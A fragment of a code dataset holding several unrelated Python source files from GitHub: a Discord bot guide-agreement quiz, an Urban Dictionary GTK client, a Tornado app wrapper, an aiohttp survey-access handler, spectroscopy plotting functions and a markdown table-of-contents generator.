perms)","repo_name":"taigi0315/AlgoExpert","sub_path":"midium_questions/getPermutations.py","file_name":"getPermutations.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19811221182","text":"from logging import exception\nimport discord\nfrom discord.ext import commands\nfrom discord.commands import slash_command\nimport time\nfrom datetime import datetime\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport asyncio\nfrom core.common import load_config\nconfig, _ = load_config()\ni = 1\ntime_convert = {\"s\": 1, \"m\": 60, \"h\": 3600, \"d\": 86400}\nimport logging\nlogger = logging.getLogger(__name__)\n\n# -------------------------------------------------------\n\ndef next_available_row(sheet):\n str_list = list(filter(None, sheet.col_values(1)))\n return str(len(str_list)+1)\n\ndef entryid_number(sheet):\n str_list = list(filter(None, sheet.col_values(1)))\n return str(len(str_list)-2)\n\nscope = [\"https://spreadsheets.google.com/feeds\", 'https://www.googleapis.com/auth/spreadsheets',\n \"https://www.googleapis.com/auth/drive.file\", \"https://www.googleapis.com/auth/drive\"]\n\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"creds.json\", scope)\n\nclient = gspread.authorize(creds)\n\nsheet = client.open(\n \"CCS8 Realm Application\").sheet1\n\n# ---CONSTANTS----------------------------------------------------\n\n\n# -------------------------------------------------------\n\ndef check_Aurafall():\n def predicate(ctx):\n return (\n ctx.message.guild.id == 298995889551310848\n or ctx.message.guild.id == 448488274562908170\n )\n\n return commands.check(predicate)\n\n\ndef check_Coastal():\n def predicate(ctx):\n return (\n ctx.message.guild.id == 305767872410419211\n or ctx.message.guild.id == 448488274562908170\n )\n\n return commands.check(predicate)\n\n\ndef check_Coastal_MRP():\n def predicate(ctx):\n return (\n ctx.message.guild.id == 305767872410419211\n or ctx.message.guild.id == 448488274562908170\n or ctx.message.guild.id == 587495640502763521\n )\n\n return commands.check(predicate)\n\n\ndef convert(time):\n try:\n return int(time[:-1]) * time_convert[time[-1]]\n except:\n return time\n\n\nclass CoastalGuideCMD(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n logger.info(\"RealmCMD: Cog Loaded!\")\n\n @slash_command(name=\"guide\",\n description=\"Agree to the guide\",\n guild_ids=[config['PBtest'], config['Coastal']])\n async def guide(self, ctx):\n guild = self.bot.get_guild(config['Coastal'])\n print(guild)\n role = guild.get_role(1159549536579096676)\n print(role)\n responsechannel = guild.get_channel(517060711202160640)\n author = ctx.author\n channel = await ctx.author.create_dm()\n\n # Answer Check\n def check(m):\n return m.content is not None and m.channel == channel and m.author is not self.bot.user\n\n embed = discord.Embed(\n title=\"Season 9 Guide Agreement\",\n description=\"Read the guide, and then answer the questions that follow.\",\n color=0x336F75,\n )\n embed.add_field(\n name=\"Online version of the guide\",\n value=\"https://bit.ly/CoastalPlayersGuide9\",\n inline=False,\n )\n embed.add_field(\n name=\"PDF version of the guide\",\n value=\"https://bit.ly/Coastal9PGpdf\",\n inline=False,\n )\n embed.set_thumbnail(\n url=\"https://cdn.discordapp.com/attachments/488792053002534920/1157338182392741999/coastal_logo_final_s9.png\"\n )\n await channel.send(embed=embed)\n await ctx.respond(\"Check your DMs\")\n await asyncio.sleep(5)\n\n question1 = \"What drink do the OPs think is good?\"\n await channel.send(question1)\n await asyncio.sleep(2)\n try:\n answer1 = await self.bot.wait_for('message', timeout=60.0, check=check)\n except asyncio.TimeoutError:\n await channel.send(\n \"I grow tired of waiting, try again later...\")\n else:\n answer1content = str.casefold(answer1.content)\n while True:\n if answer1content != str.casefold(\"cappuccino\"):\n prompt = \"Wrong! Try again: \"\n await channel.send(prompt)\n await asyncio.sleep(2)\n answer1 = await self.bot.wait_for('message', timeout=60.0, check=check)\n else:\n prompt = \"Great Job!!!\"\n await channel.send(prompt)\n break\n \n question2 = \"Do you agree to the guide? Please answer yes or no.\"\n await channel.send(question2)\n await asyncio.sleep(2)\n try:\n answer2 = await self.bot.wait_for('message', timeout=60.0, check=check) \n except asyncio.TimeoutError:\n await channel.send(\n \"I grow tired of waiting, try again later...\")\n else: \n answer2content = str.casefold(answer2.content) \n if answer2content == str.casefold(\"yes\"):\n prompt = \"Great! Have fun Playing Coastal Craft 9: Sakura Shores\"\n await channel.send(prompt)\n await author.add_roles(role)\n await asyncio.sleep(2)\n\n embed = discord.Embed(title=\"Season 9 Guide Agreement\", description=author.name + \" has agreed to the season 9 guide!\", color=0x000800)\n embed.set_thumbnail(url = \"https://cdn.discordapp.com/attachments/488792053002534920/1157338182392741999/coastal_logo_final_s9.png\")\n await responsechannel.send(embed=embed)\n else:\n prompt = \"Please get with an OP to discuss your concerns\"\n await channel.send(prompt)\n\n\n @guide.error\n async def guide_error(self, ctx, error):\n if isinstance(error, commands.MissingRole):\n await ctx.send(\"Uh oh, looks like you don't have the Moderator role!\")\n else:\n raise error\n\ndef setup(bot):\n bot.add_cog(CoastalGuideCMD(bot))\n","repo_name":"bsavage81/TheOldKing","sub_path":"cogs/Coastal_Cogs/CoastalGuide.py","file_name":"CoastalGuide.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35788796297","text":" \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport BeautifulSoup\nimport pygtk\npygtk.require(\"2.0\")\nimport gtk\nimport urllib\n\nclass udclient:\n def __init__(self):\n self.filename=\"./interface.glade\"\n self.builder=gtk.Builder()\n self.builder.add_from_file(self.filename)\n \n #getting objects from glade file\n self.win=self.builder.get_object(\"mainwin\")\n self.search=self.builder.get_object(\"search\")\n self.send=self.builder.get_object(\"send\")\n self.scrw=self.builder.get_object(\"scrw\")\n self.result=self.builder.get_object(\"result\")\n\n #main window's settings\n self.win.set_size_request(400,600)\n self.win.connect(\"destroy\",self.destroy)\n self.win.connect(\"key-press-event\",self.keypressed)\n\n #enabling wrap mode\n self.result.set_wrap_mode(gtk.WRAP_WORD)\n\n #connect callbacks\n self.send.connect(\"clicked\",self.respond)\n\n self.result_buffer=self.result.get_buffer()\n\n self.win.set_title(\"Urban Dictionary-Version 1.0\")\n self.win.show_all()\n\n #the callback for main window's destroy event\n def destroy(self,widget):\n gtk.main_quit()\n\n #the callback for keypress event\n def keypressed(self,widget,event):\n if event.keyval==65293:\n self.respond(self.send)\n \n #the function which activates httpreactor function and formats the result into readable form\n def respond(self,widget):\n self.query=self.search.get_text()\n self.query=self.query.replace(\" \",\"+\")\n print(self.query)\n self.response=self.httpreactor(self.query)\n print(self.response)\n self.real_result=\"\"\n count=1\n for each in self.response:\n self.real_result=self.real_result+'\\n'+'Definition: '+str(count)+'\\n'+'\\t'+str(each).replace(\""\",'\"')+'\\n'\n count=count+1\n self.result_buffer.set_text(self.real_result)\n\n #This is the function which will contact Urban Dictionary\n def httpreactor(self,query):\n data=[]\n data_to_server=\"http://www.urbandictionary.com/define.php?term=\"+query\n sock=urllib.urlopen(data_to_server)\n data_received=sock.read()\n sock.close()\n soup=BeautifulSoup.BeautifulSoup(data_received)\n for elm in soup.findAll('div',{'class':'definition'}):\n data.append(elm.text)\n #print(elm.text)\n #print(data)\n return data\n\nif __name__==\"__main__\":\n client=udclient()\n gtk.main()\n","repo_name":"rajat1saxena/UrbanDictionaryClient","sub_path":"udclient/udclient.py","file_name":"udclient.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18312533337","text":"#!/usr/bin/env python\n#encoding:utf-8\n'''\nAuthor : ming\ndate : 2018年1月12日13:43:27\nrole : 定制 Application\n'''\nfrom shortuuid import uuid\nfrom tornado import httpserver, ioloop\nfrom tornado import options as tnd_options\nfrom tornado.options import options, define\nfrom tornado.web import Application as tornado_app\nfrom libs.web_logs import Logger, ins_log\n\ndefine(\"addr\", default='0.0.0.0', help=\"run on the given ip address\", type=str)\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\ndefine(\"progid\", default=str(uuid()), help=\"tornado progress id\", type=str)\n\n\nclass Application(tornado_app):\n \"\"\" 定制 Tornado Application 集成日志、sqlalchemy 等功能 \"\"\"\n\n def __init__(self, handlers=None, default_host=\"\",\n transforms=None, **settings):\n #print('options.port=>>>',options.port)\n tnd_options.parse_command_line() #解析命令行 --port=9001\n #print('options.port=>>>',options.port)\n Logger(options.progid)\n # Logger().init_logger(options.progid)\n super(Application, self).__init__(handlers, default_host,\n transforms, **settings)\n http_server = httpserver.HTTPServer(self)\n http_server.listen(options.port, address=options.addr)\n self.io_loop = ioloop.IOLoop.instance()\n def start_server(self):\n \"\"\"\n 启动 tornado 服务\n :return:\n \"\"\"\n try:\n ins_log.read_log('info', 'progressid: %(progid)s' % dict(progid=options.progid))\n ins_log.read_log('info', 'server address: %(addr)s:%(port)d' % dict(addr=options.addr, port=options.port))\n ins_log.read_log('info', 'web server start sucessfuled.')\n self.io_loop.start()\n except KeyboardInterrupt:\n self.io_loop.stop()\n except:\n import traceback\n ins_log.read_log('error', '%(tra)s'% dict(tra=traceback.format_exc()))\n #Logger.error(traceback.format_exc())\n\n\nif __name__ == '__main__':\n pass","repo_name":"yangmv/k8sMG","sub_path":"libs/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"3"} +{"seq_id":"10769940285","text":"import logging\n\nimport aiohttp_jinja2\nfrom aiohttp.client_exceptions import ClientConnectionError, ClientConnectorError, ClientResponseError\nfrom aiohttp.web import HTTPFound, RouteTableDef, json_response\nfrom sdc.crypto.encrypter import encrypt\nfrom structlog import wrap_logger\n\nfrom . import (\n BAD_CODE_MSG, BAD_CODE_TYPE_MSG, BAD_RESPONSE_MSG, INVALID_CODE_MSG, NOT_AUTHORIZED_MSG, VERSION)\nfrom .case import get_case, post_case_event\nfrom .eq import EqPayloadConstructor\nfrom .exceptions import CompletedCaseError, InvalidIACError, InactiveIACError\nfrom .flash import flash\n\n\nlogger = wrap_logger(logging.getLogger(\"respondent-home\"))\nroutes = RouteTableDef()\n\n\n@routes.view('/info', use_prefix=False)\nclass Info:\n\n @staticmethod\n async def get(request):\n info = {\n \"name\": 'respondent-home-ui',\n \"version\": VERSION,\n }\n if 'check' in request.query:\n info[\"ready\"] = await request.app.check_services()\n return json_response(info)\n\n\n@routes.view('/')\nclass Index:\n\n def __init__(self):\n self.iac = None\n self.request = None\n\n @property\n def client_ip(self):\n if not hasattr(self, '_client_ip'):\n self._client_ip = self.request.headers.get(\"X-Forwarded-For\")\n return self._client_ip\n\n @property\n def iac_url(self):\n return f\"{self.request.app['IAC_URL']}/iacs/{self.iac}\"\n\n @staticmethod\n def join_iac(data, expected_length=12):\n combined = \"\".join([v.lower() for v in data.values()][:3])\n if len(combined) < expected_length:\n raise TypeError\n return combined\n\n @staticmethod\n def get_collex_id(case_json):\n try:\n return case_json['caseGroup']['collectionExerciseId']\n except KeyError:\n logger.warn(\"Failed to get collex_id from case_json['caseGroup']['collectionExerciseId']\")\n\n @staticmethod\n def validate_iac_active(iac_json, case_json):\n if not iac_json.get(\"active\", False):\n collex_id = Index.get_collex_id(case_json)\n\n try:\n if case_json['caseGroup']['caseGroupStatus'] == 'COMPLETE':\n logger.info('Attempt to use inactive iac for completed case', collex_id=collex_id)\n raise CompletedCaseError\n except KeyError:\n logger.warn(\"Field case_json['caseGroup']['caseGroupStatus'] not found\")\n\n logger.info('Attempt to use inactive iac for incomplete case', collex_id=collex_id)\n raise InactiveIACError\n\n def check_case_sample_unit_type_valid(self, case_json):\n try:\n assert case_json['sampleUnitType'] == 'H'\n except AssertionError:\n logger.warn('Attempt to use unexpected sample unit type', sample_unit_type=case_json['sampleUnitType'])\n flash(self.request, BAD_CODE_TYPE_MSG)\n return False\n except KeyError:\n logger.error('sampleUnitType missing from case response', client_ip=self.client_ip)\n flash(self.request, BAD_RESPONSE_MSG)\n return False\n\n return True\n\n def redirect(self):\n raise HTTPFound(self.request.app.router['Index:get'].url_for())\n\n async def get_token(self, case_json):\n eq_payload = await EqPayloadConstructor(case_json, self.request.app, self.iac).build()\n return encrypt(eq_payload, key_store=self.request.app['key_store'], key_purpose=\"authentication\")\n\n async def get_iac_details(self):\n logger.debug(f\"Making GET request to {self.iac_url}\", iac=self.iac, client_ip=self.client_ip)\n try:\n async with self.request.app.http_session_pool.get(self.iac_url, auth=self.request.app[\"IAC_AUTH\"]) as resp:\n logger.debug(\"Received response from IAC\", iac=self.iac, status_code=resp.status)\n\n try:\n resp.raise_for_status()\n except ClientResponseError as ex:\n if resp.status == 404:\n raise InvalidIACError\n elif resp.status in (401, 403):\n logger.info(\"Unauthorized access to IAC service attempted\", client_ip=self.client_ip)\n flash(self.request, NOT_AUTHORIZED_MSG)\n return self.redirect()\n elif 400 <= resp.status < 500:\n logger.warn(\n \"Client error when accessing IAC service\",\n client_ip=self.client_ip,\n status=resp.status,\n )\n flash(self.request, BAD_RESPONSE_MSG)\n return self.redirect()\n else:\n logger.error(\"Error in response\", url=resp.url, status_code=resp.status)\n raise ex\n else:\n return await resp.json()\n except (ClientConnectionError, ClientConnectorError) as ex:\n logger.error(\"Client failed to connect to iac service\", client_ip=self.client_ip)\n raise ex\n\n @aiohttp_jinja2.template('index.html')\n async def get(self, _):\n return {}\n\n @aiohttp_jinja2.template('index.html')\n async def post(self, request):\n \"\"\"\n Main entry point to building an eQ payload as URL parameter.\n \"\"\"\n self.request = request\n data = await self.request.post()\n\n try:\n self.iac = self.join_iac(data)\n except TypeError:\n logger.warn(\"Attempt to use a malformed access code\", client_ip=self.client_ip)\n flash(self.request, BAD_CODE_MSG)\n return self.redirect()\n\n try:\n iac_json = await self.get_iac_details()\n except InvalidIACError:\n logger.info(\"Attempt to use an invalid access code\", client_ip=self.client_ip)\n flash(self.request, INVALID_CODE_MSG)\n return aiohttp_jinja2.render_template(\"index.html\", self.request, {}, status=202)\n\n try:\n case_id = iac_json[\"caseId\"]\n except KeyError:\n logger.error('caseId missing from IAC response', client_ip=self.client_ip)\n flash(self.request, BAD_RESPONSE_MSG)\n return {}\n\n case_json = await get_case(case_id, self.request.app)\n\n self.validate_iac_active(iac_json, case_json)\n\n if not self.check_case_sample_unit_type_valid(case_json):\n return {}\n\n token = await self.get_token(case_json)\n\n description = f\"Instrument LMS launched for case {case_id}\"\n await post_case_event(case_id, 'EQ_LAUNCH', description, self.request.app)\n\n logger.info('Redirecting to eQ', client_ip=self.client_ip)\n raise HTTPFound(f\"{self.request.app['EQ_URL']}/session?token={token}\")\n\n\n@routes.view('/cookies-privacy')\nclass CookiesPrivacy:\n @aiohttp_jinja2.template('cookies-privacy.html')\n async def get(self, _):\n return {}\n\n\n@routes.view('/contact-us')\nclass ContactUs:\n @aiohttp_jinja2.template('contact-us.html')\n async def get(self, _):\n return {}\n","repo_name":"ONSdigital/respondent-home-ui","sub_path":"app/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"42052681877","text":"if __name__ == \"__main__\":\n print(\"You must call this program from main.py!\")\n choice = input(\"Press ENTER to exit...\")\n from sys import exit\n exit()\n\n### Coverts a value from science form two two decimal places.\ndef floatFormatting(valueToSquash):\n return \"{:.2f}\".format(valueToSquash)\n\n\n### Iterates over an array to flatten the scientific values to two decimal places.\ndef applyFloatFormat(arrayToIterate):\n listToReturn = []\n for i in range(len(arrayToIterate)):\n listToReturn.append(floatFormatting(arrayToIterate[i]))\n return listToReturn\n\n\n### Generates the figures used. Creates the overall figure and then individual figures all of which have the option of\n### being saved.\ndef surfacePlotting(time, wavelength, intensity, logTruncTime, intensPos, refactored):\n\n # Handles plotting before refactoring.\n if refactored == False:\n return 0\n\n from matplotlib import pyplot as plt\n from matplotlib import cm\n import os\n\n # Creates the figure object.\n plt.rc(\"font\", size=11)\n fig = plt.figure(figsize=(10, 8), dpi=100, facecolor=\"white\")\n\n # Creates the general axis objects and adds them to the main figure object.\n ax0 = fig.add_subplot(2, 2, 1)\n ax1 = fig.add_subplot(2, 2, 2)\n ax2 = fig.add_subplot(2, 2, 3)\n ax3 = fig.add_subplot(2, 2, 4)\n\n # Creates the heatmap axis objects.\n ax0Plot = ax0.pcolormesh(wavelength, logTruncTime, intensPos, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n ax1Plot = ax1.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n ax2Plot = ax2.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n ax3Plot = ax3.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n\n # Crops the x-limits for other graphs.\n ax2.set_xlim(0, 5)\n ax3.set_xlim(0, 100)\n\n # Formatting.\n ax0.set_ylabel(\"log(Time Delay) / log(ps)\", fontsize=\"medium\", fontweight=\"bold\")\n ax0.set_xlabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax2.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n ax2.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax3.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n ax3.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n fig.colorbar(ax0Plot, ax=ax0)\n fig.colorbar(ax1Plot, ax=ax1)\n fig.colorbar(ax2Plot, ax=ax2)\n fig.colorbar(ax3Plot, ax=ax3)\n fig.tight_layout(h_pad=2.0, w_pad=3.0)\n\n # Allows program execution whilst figure displays.\n print(\"Drawing plot...\")\n plt.show(block=False)\n\n # Halts program execution.\n input(\"\\n>>> Press ENTER to resume program...\")\n \n # Gives user the option to save the figure.\n saveFig = str(input(\"\\n>>> Do you want to save this figure? (y/n): \"))\n while True:\n if saveFig.lower() == \"y\":\n\n # Saves the main figure.\n fileName = str(input(\"\\n>>> Enter a filename: \"))\n fileNamePath = str(os.getcwd() + \"\\\\savedSurfacePlots\\\\\" + fileName + \".png\")\n plt.savefig(fileNamePath, format=\"png\")\n\n # Generates the first individual figure and saves it.\n plt.rc(\"font\", size=14)\n tempFig1 = plt.figure(figsize=(8, 8), tight_layout=True)\n tempAx1 = tempFig1.add_subplot(1, 1, 1)\n tempAx1Plot = tempAx1.pcolormesh(wavelength, logTruncTime, intensPos, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n\n # More formatting.\n tempAx1.set_ylabel(\"log(Time Delay) / log(ps)\", fontsize=\"medium\", fontweight=\"bold\")\n tempAx1.set_xlabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n tempFig1.colorbar(tempAx1Plot, ax=tempAx1)\n plt.savefig(str(os.getcwd() + \"\\\\savedSurfacePlots\\\\\" + fileName + str(\"_individual_\" + str(1)) + \".png\"), format=\"png\")\n plt.close(tempFig1)\n\n for i in range(3):\n\n # Generates the remaining individual cropped figures.\n tempFig2 = plt.figure(figsize=(8, 8), tight_layout=True)\n tempAx2 = tempFig2.add_subplot(1, 1, 1)\n tempAx2Plot = tempAx2.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n\n # Defines the limits for the cropped figures.\n if i == 1:\n tempAx2.set_xlim(0, 5)\n\n elif i == 2:\n tempAx2.set_xlim(0, 100)\n\n # Even More formatting.\n tempAx2.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n tempAx2.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n tempFig2.colorbar(tempAx2Plot, ax=tempAx2)\n\n # Saves the remaining cropped figures.\n plt.savefig(str(os.getcwd() + \"\\\\savedSurfacePlots\\\\\" + fileName + str(\"_individual_\" + str(i + 2)) + \".png\"), format=\"png\")\n plt.close(tempFig2)\n\n # Closes the final figure object\n plt.close(fig)\n break\n\n elif saveFig.lower() ==\"n\":\n plt.close(fig)\n break\n \n else:\n saveFig = str(input(\"\\n>>> I'm sorry, I didn't catch that. Do you want to save this figure? (y/n): \"))\n\n # Halts program execution.\n input(\"\\n>>> Press ENTER to resume program...\")\n\n return 1\n\n\n### Plots all of the data from the desired file. This plot will be generated and displayed to\n### the user but is not saved.\ndef plotSingleDataset(datasetChoice, directoryFiles, saveDialog=True, definedWavelengths=None, colormap=\"Spectral_r\"):\n\n ### Tries to convert the dataset chosen to an integer type. If this fails then we return 0.\n try:\n datasetChoice = int(datasetChoice)\n \n except TypeError:\n return 0\n \n else:\n from os import getcwd\n from pandas import read_csv\n from matplotlib import pyplot as plt\n from seaborn import heatmap, color_palette\n from numpy import genfromtxt, delete\n \n ### Sets the file paths\n path = str(getcwd() + \"\\\\refactoredDataFiles\\\\\" + directoryFiles[datasetChoice-1])\n rawPath = str(getcwd() + \"\\\\rawDataFiles\\\\\" + directoryFiles[datasetChoice-1][:-4] + \".txt\")\n\n ### Loads the data as a 2D NumPy array.\n array = genfromtxt(rawPath)\n\n ### Generating the array used as the actual Pandas df index.\n wavelength = delete(array[:,0], 0)\n time = delete(array[0,:], 0)\n\n ### Convert the axis lists into readable float types\n wavelengthFloat = applyFloatFormat(wavelength)\n timeFloat = applyFloatFormat(time)\n\n ### Tries to loadt the requested DataFrame. If this fails, then the function returns 0.\n try: \n df = read_csv(path, header=0, index_col=0) \n except FileNotFoundError:\n print(\"The requested file was not accessible, please try another file.\")\n return 0\n\n ### Constructs the figure space and creates the two axes object for plotting.\n fig = plt.figure(figsize=(15,6), frameon=True, facecolor=\"white\")\n ax0 = fig.add_subplot(1, 2, 1)\n ax1 = fig.add_subplot(1, 2, 2)\n \n ### Generates the heatmap for the data using Seaborn heatmap\n heatmap(df, cmap=color_palette(\"Spectral_r\", as_cmap=True), ax=ax0)\n\n ### Sets the ticks and tick labels to the more readable float formats for the heatmap.\n ax0.set_xlabel(\"Time / s\", fontsize=\"medium\", fontweight=\"bold\")\n ax0.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax0.set_xticks([x for x in range(0, len(timeFloat), 7)])\n ax0.set_yticks([x for x in range(0, len(wavelengthFloat), 19)])\n ax0.set_xticklabels([timeFloat[x] for x in range(0, len(timeFloat), 7)])\n ax0.set_yticklabels([wavelengthFloat[x] for x in range(0, len(wavelengthFloat), 19)])\n\n ### Extracts each intensity value at a certain wavelength for the duration of the experiemnt\n ### to a list. Each list is then stored in a bigger list of values.\n intensityValues = df.values.tolist()\n\n if definedWavelengths == None:\n ### Selects a sample of the intensityValues using the plottingValues list. This will select\n ### 6 wavelengths to display (regularly spaced intervals).\n plottingValues = [x for x in range(0, len(wavelength), (len(wavelength)//6))]\n\n ### Defines the plotting variables for the sample graph.\n ax1.plot(time, intensityValues[plottingValues[0]], '-r',\n time, intensityValues[plottingValues[1]], '-y',\n time, intensityValues[plottingValues[2]], '-g',\n time, intensityValues[plottingValues[3]], '-c',\n time, intensityValues[plottingValues[4]], '-b',\n time, intensityValues[plottingValues[5]], '-m')\n \n elif definedWavelengths != None:\n ### Uses the defined wavelengths for plotting. Searches the raw wavelength array for the wavelengths\n ### specified and returns the indices for these positions.\n plottingValues = []\n wavelength = wavelength.tolist()\n for i in range(len(definedWavelengths)):\n plottingValues.append(wavelength.index(definedWavelengths[i]))\n\n ### Defines the plotting variables for the sample graph. This uses the returned position indices above.\n ax1.plot(time, intensityValues[plottingValues[0]], '-r',\n time, intensityValues[plottingValues[1]], '-y',\n time, intensityValues[plottingValues[2]], '-g',\n time, intensityValues[plottingValues[3]], '-c',\n time, intensityValues[plottingValues[4]], '-b',\n time, intensityValues[plottingValues[5]], '-m')\n\n ### Sets the ticks and tick labels to the more readable float formats for the decay graph.\n ax1.set_xlabel(\"Time / s\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_ylabel(\"Intensity / arb.\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_xlim(-1,100)\n \n ### Formatting\n ax1.legend([wavelengthFloat[plottingValues[0]],\n wavelengthFloat[plottingValues[1]],\n wavelengthFloat[plottingValues[2]],\n wavelengthFloat[plottingValues[3]],\n wavelengthFloat[plottingValues[4]],\n wavelengthFloat[plottingValues[5]]],\n title=\"Wavelength / nm\",\n title_fontsize=\"medium\",\n fontsize=\"small\",\n labelspacing=0.7,\n columnspacing=3.0\n )\n\n ### Shows the figure containing the plots with some minor spacing adjustment. This code will always\n ### be called when under userChoice = 3, but will be ignored under userChoice = 4. This is because\n ### the latter needs to just save the files continuously.\n plt.subplots_adjust(wspace=0.250, bottom=0.165)\n if saveDialog == True:\n print(\"Drawing plot...\")\n plt.show(block=False)\n\n ### Halts program execution until the user closes the plot window. This then closes all\n ### open figures as a safeguard measure.\n input(\"\\n>>> Press ENTER to resume program...\")\n\n ### Gives user the option to save the figure.\n saveFig = str(input(\"\\n>>> Do you want to save this figure? (y/n): \"))\n if saveFig.lower() == \"y\":\n fileName = str(input(\"\\n>>> Enter a filename: \"))\n fileName = str(getcwd() + \"\\\\savedGeneralPlots\\\\\" + fileName + \".png\")\n plt.savefig(fileName, format=\"png\")\n \n ### Saves the figus without creating the diaglog options for the user to go through. This path is used\n ### bulk plot saving and is only called under userChoice = 4.\n elif saveDialog == False:\n fileName = directoryFiles[datasetChoice-1][:-4]\n fileName = str(getcwd() + \"\\\\savedGeneralPlots\\\\\" + fileName + \".png\")\n plt.savefig(fileName, format=\"png\")\n\n plt.close(\"all\")\n return 1\n\n\n### Loop call to plotSingleDataset function which will generate graphs iteratively with the\n### different available datasets.\ndef generatePlots(directoryFiles, colormap=\"Spectral_r\"):\n for i in range(len(directoryFiles)):\n print(\"Plotting: \" + str(directoryFiles[i][:-4]))\n plotSingleDataset(i, directoryFiles, saveDialog=False, colormap=colormap)\n print(\"Finished Plotting: \" + str(directoryFiles[i][:-4] + \"\\n\"))\n return 1\n\n\n### Assigns the wavelengths to use as a list and returns them for use as the general 1D plot.\n### This is not a necessary assignment but allows the user to choose whether they want specific\n## wavelengths or whether they want the general equally-spaced wavelengths.\ndef getWavelengths():\n wavelengthList = []\n round = [\"first\", \"second\", \"third\", \"fourth\", \"fifth\", \"sixth\"]\n for i in range(6):\n try:\n wavelengthValue = float(input(\"\\n>>> Enter the {round} wavelength in full: \".format(round=round[i])))\n wavelengthList.append(wavelengthValue)\n except ValueError:\n print(\"\\nThe values entered do not belong to the float type.\")\n print(\"Please repeat the process and enter float values.\")\n print(\"Returning to main menu.\")\n return 0\n return wavelengthList\n\n","repo_name":"nicholas-lau/TAplotS","sub_path":"figurePlottingFunctions.py","file_name":"figurePlottingFunctions.py","file_ext":"py","file_size_in_byte":13955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10632314417","text":"import re\n\n\nclass ContentErrorException(Exception):\n pass\n\n\ndef next_no_blank(contents):\n for index, single_line in enumerate(contents):\n if single_line.strip():\n return index\n\n\ndef next_blank(contents):\n for index, single_line in enumerate(contents):\n if not single_line.strip():\n return index\n\n\nclass Toggle(object):\n def __init__(self, url_prefix, content=None, filename=None, match_rules=None, sub_rules=None):\n if not content and not filename:\n raise ContentErrorException(\"Please pass in some content to transfer\")\n elif content is not None:\n self.content = content\n else:\n self.filename = filename\n self.content = open(filename).readlines()\n\n self.url_prefix = url_prefix\n self.sub_rules = sub_rules or {\n \" \": \"-\",\n \"/\": \"\",\n \"\\.\": \"\", # 正则表达式字符需要转义\n \"`\": \"\",\n \"\\(\": \"\",\n \"\\)\": \"\",\n \"[A-Z]\": \"lambda x: x.group().lower()\" # 转换成小写\n }\n self.match_rules = match_rules or {\n \"===\": \"- \",\n '---': \" - \"\n }\n self.default_start = [\"Contents\\n\", \"===\\n\", \"\\n\"]\n self.default_end = [\"Contents Created by [Toggle](https://github.com/Microndgt/toggle)\\n\"]\n\n def parse(self, contents):\n _last = None\n for line in contents:\n if line.startswith(tuple(self.match_rules.keys())):\n # 匹配到了,但是没有_last或者_last为空则报错\n if not _last or not _last.strip():\n raise ContentErrorException(\"Markdown Content maybe wrong!\")\n yield _last, line[:3]\n _last = line\n\n def format(self, line, _class):\n origin_line = line\n for match, repl in self.sub_rules.items():\n line = re.sub(match, eval(repl) if repl.startswith(\"lambda\") else repl, line)\n url_line = \"[{}]({})\\n\".format(origin_line.strip(), self.url_prefix + \"#\" + line.strip())\n return self.match_rules[_class] + url_line\n\n def update(self):\n\n content_start = next_no_blank(self.content)\n if self.content[content_start] != self.default_start[0]:\n print(\"didn't find a content to update\")\n\n real_content_start = next_no_blank(self.content[content_start + 2:]) + content_start + 1\n real_content_end = next_blank(self.content[real_content_start + 1:]) + real_content_start + 1\n\n body_start = next_no_blank(self.content[real_content_end + 1:]) + real_content_end + 1\n\n body = self.content[body_start:]\n contents = self._toggle(body)\n contents.extend(body)\n return contents\n\n def generate(self):\n contents = self._toggle(self.content)\n contents.extend(self.content)\n return contents\n\n def _toggle(self, _contents=None):\n if not _contents:\n print(\"data is 